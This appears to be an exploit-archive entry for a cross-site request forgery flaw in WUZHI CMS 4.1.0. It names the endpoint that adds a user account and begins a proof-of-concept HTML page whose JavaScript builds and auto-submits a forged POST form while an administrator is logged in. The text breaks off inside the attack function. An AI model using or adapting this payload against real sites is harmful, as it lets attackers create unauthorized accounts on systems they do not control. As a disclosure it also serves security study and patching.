Exploits / Vulnerability Discovered : 2018-04-10 |
Type : webapps |
Platform : php
This exploit / vulnerability Wuzhi cms 4.1.0 crosssite request forgery (add user) is for educational purposes only and if it is used you will do on your own risk!
An issue was discovered in WUZHI CMS 4.1.0.(https://github.com/wuzhicms/wuzhicms/issues/128)
There is a CSRF vulnerability that can add a user account via index.php?m=member&f=index&v=add.
After the administrator logged in, open the csrf exp page.
<html><body>
<script type="text/javascript">
function post(url,fields)
{
var p = document.createElement("form");
p.action = url;
p.innerHTML = fields;
p.target = "_self";
p.method = "post";
document.body.appendChild(p);
p.submit();
}
function csrf_hack()
{
var fields;